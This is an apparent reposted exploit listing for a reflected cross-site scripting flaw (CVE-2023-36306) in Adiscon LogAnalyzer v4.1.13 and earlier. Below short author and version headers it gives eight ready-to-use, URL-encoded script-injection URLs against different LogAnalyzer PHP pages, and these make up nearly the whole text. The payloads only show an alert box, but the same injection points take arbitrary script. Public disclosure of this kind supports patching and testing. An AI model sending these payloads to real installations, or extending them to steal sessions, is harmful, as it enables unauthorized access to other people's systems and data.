Adiscon LogAnalyzer v.4.1.13 Exploit, Cross Site Scripting

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation method.
If you installed without database(File-Based),No need to login.
If you installed with database, You should login with Read Only User(at least)

XSS Payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD